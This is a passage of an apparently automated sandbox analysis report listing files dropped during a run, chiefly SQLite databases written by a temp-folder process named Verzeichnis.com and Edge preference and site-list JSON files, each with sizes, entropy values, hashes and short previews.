                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.com
                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.com
                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):294912
                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.08436837154972243
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23v2:51zkVmvQhyn+Zoz67f
                                                                                                                                                                                                                                                                                                    MD5:BDDB3A7A4643B027E8E743D32B86297D
                                                                                                                                                                                                                                                                                                    SHA1:AACAA39E60FB34908241F75550B1CEDDA50E37D1
                                                                                                                                                                                                                                                                                                    SHA-256:13BC4A6A15651C116209341E97255C67980005927DFD9E91236E2E1517AF97EF
                                                                                                                                                                                                                                                                                                    SHA-512:9A6244248CA636DB12AEC2E56DEAEAA2D62ED8378EA5A1D9947938DA15CA66BC4EDF11BF7CCC92E43734449EBECD03CF538BB61FCF90798DEBFD65098BC2A444
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.com
                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):159744
                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                                                    MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                                                    SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                                                    SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                                                    SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.com
                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):106496
                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.136471148832945
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                                                                                                                                    MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                                                                                                                                    SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                                                                                                                                    SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                                                                                                                                    SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.com
                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):98304
                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.com
                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):196608
                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.2678265992967903
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:384:L/2qOB1nxCkMmSA1LyKOMq+8iP5GDHP/0jMVump:Kq+n0Jm91LyKOMq+8iP5GLP/0s
                                                                                                                                                                                                                                                                                                    MD5:2000A03D82D7CCF84ECA7EC4BE27DD26
                                                                                                                                                                                                                                                                                                    SHA1:45DF8FB549B4EDCDD2DB0E8EC670B298CFD8780F
                                                                                                                                                                                                                                                                                                    SHA-256:F50D12B32E900AC4FBC8BAA7E652DA0196B879113E2A511B38E5607B4E11537C
                                                                                                                                                                                                                                                                                                    SHA-512:674CC677BA89390D24E609656447A293D76CA5C212EAA1F04774E16DC915C2C815299CA4FF2012026BFC7FD6ACED4ABC2A957CB2E07D574CA888F783DB28EA06
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......[...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.com
                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):155648
                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                                                    MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                                                    SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                                                    SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                                                    SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):46441
                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.087193382071345
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:768:PMkbJrT8IeQc5dKJk9i1zNt7Ln9sdD+lbR6URkCioBJDSgzMMd6qD47u30n:PMk1rT8H1KvZlkFoBtSmd6qE7p
                                                                                                                                                                                                                                                                                                    MD5:F3DD886685C6D2AB654A0AA8706B8F6B
                                                                                                                                                                                                                                                                                                    SHA1:2E8F8AC0FDD8C7C1B2F4B3638A41ABFEF4F9CFFB
                                                                                                                                                                                                                                                                                                    SHA-256:1A197DBE5702933ED3901A47373DE1118A69729B74067B50D5D4799B49ED7686
                                                                                                                                                                                                                                                                                                    SHA-512:CCAB54F96B525D1AE339505A3066229764EA6B5F1E949B18CA25B5737AA1A3BD63840853D17DFDBC6E6CE5CDF2FF55579FFA232B97B4DB0B9154445B4B90535D
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13377747732125277","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"continuous_migration":{"local_guid":"994048c2-8a7a-4dde-9c80-2a290a3671aa"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733274136"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):44906
                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.095194996531794
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWM+i1zNt7LnNErJEufhLnbKJDSgzMMd6qD47u3+CiB:+/Ps+wsI7yn/aKtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                    MD5:C63A2FDEEFAAD6B547B8F9A3F7312A0B
                                                                                                                                                                                                                                                                                                    SHA1:9B5E16F4C47832ED5E5E387ABE1C3EB5E78951C2
                                                                                                                                                                                                                                                                                                    SHA-256:AF31407206EB57D5C0891B2CA6534EAFD83D2CAC616FF0F74F002CA23C10A9D5
                                                                                                                                                                                                                                                                                                    SHA-512:331E1B2837FB05DBB4B5B4453188889F94D5DA53094FFB6E41E7DAF9AF75E8A1833C16A66AA840BDE1344D91870593FDFFFF6D5608FE05DBE5463C2752488B5B
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):44455
                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.089779405179669
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWzdi1zNtPMJkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynNOkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                    MD5:5915190E94C5F0C68D2F6101F4510098
                                                                                                                                                                                                                                                                                                    SHA1:EA5484700EC7DB3882F6B326DB405EE49DC5AD96
                                                                                                                                                                                                                                                                                                    SHA-256:E1241004A7AF4EC5CBFE3E8CBAC6CFBDA28A556753E099A96C9CA05371744B81
                                                                                                                                                                                                                                                                                                    SHA-512:E76AEEA6159668E4EFF5E7298E423A9366A8661C2650616D5D2EABF56A02BF1E42DA36D217C8D0440E0BBDE1178184A69061512A647B4AC0FA30DFBFBEE3C78D
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):46394
                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.0874544363041085
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:768:PMkbJrT8IeQc5dKJf9i1zNt7Ln9sdD+lbR6URkCioBJDSgzMMd6qD47u30n:PMk1rT8H1KaZlkFoBtSmd6qE7p
                                                                                                                                                                                                                                                                                                    MD5:1B00450A92947129B944BC8EC36B583F
                                                                                                                                                                                                                                                                                                    SHA1:0CCD3FA46C967C51EE182CBBE3DFF834A3F72982
                                                                                                                                                                                                                                                                                                    SHA-256:AE143616EEA44452425F3B82B771FB6F60B14AAC1C2A81D3F56100AE3EA8F086
                                                                                                                                                                                                                                                                                                    SHA-512:7291EBC501A087923F45E1EDBA1B26A113BA4717DC0776DDD7BC47AA237994ED63C8EAF48DD86A1D4E3C4CA9008982EC777FD58530492D89E42FFC6E5C2392A0
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13377747732125277","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"continuous_migration":{"local_guid":"994048c2-8a7a-4dde-9c80-2a290a3671aa"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733274136"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):45003
                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.095143366054936
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4xWS+i1zNt7Ln9sdD+lKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7yODZKtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                    MD5:76229B835E3307FAFCB4A2CEE98A127D
                                                                                                                                                                                                                                                                                                    SHA1:11C3B2E3D231629DE8307A25E04AAFAD8C359B87
                                                                                                                                                                                                                                                                                                    SHA-256:3288D1438DE3F65EB4B2097431F133199B74F9ECBA4A581FF7B82B0147B5B594
                                                                                                                                                                                                                                                                                                    SHA-512:889A35F83EB90A2F87CF9B5CA4ED57A0FF3607A73AA1EFF9DBBA79EE2B3E785EE07B7AF5C7310FBE466B406EAA819928A1579389C610BC5740FC1DB7BB2BA8B8
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):107893
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.64013246649014
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P78:fwUQC5VwBIiElEd2K57P78
                                                                                                                                                                                                                                                                                                    MD5:10101225085294C4AA9050CEF19E599D
                                                                                                                                                                                                                                                                                                    SHA1:D1E683B46B7E0B1C4DE538392F7ACB4DF6280404
                                                                                                                                                                                                                                                                                                    SHA-256:6F703C25109774C2D844787790FFA45183787FBFA140A5AEAD247638E0987C21
                                                                                                                                                                                                                                                                                                    SHA-512:A8C5867A96AD36813905AD2C01D5C18CBB82D3F1F91DFCE64E48D60EED226F1F16DBD5F3B8FC9DF065D0C641A3245EC6E59556EE4B2C219852B0C43584D334F4
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):107893
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.64013246649014
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P78:fwUQC5VwBIiElEd2K57P78
                                                                                                                                                                                                                                                                                                    MD5:10101225085294C4AA9050CEF19E599D
                                                                                                                                                                                                                                                                                                    SHA1:D1E683B46B7E0B1C4DE538392F7ACB4DF6280404
                                                                                                                                                                                                                                                                                                    SHA-256:6F703C25109774C2D844787790FFA45183787FBFA140A5AEAD247638E0987C21
                                                                                                                                                                                                                                                                                                    SHA-512:A8C5867A96AD36813905AD2C01D5C18CBB82D3F1F91DFCE64E48D60EED226F1F16DBD5F3B8FC9DF065D0C641A3245EC6E59556EE4B2C219852B0C43584D334F4
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):4194304
                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.4285638192565173
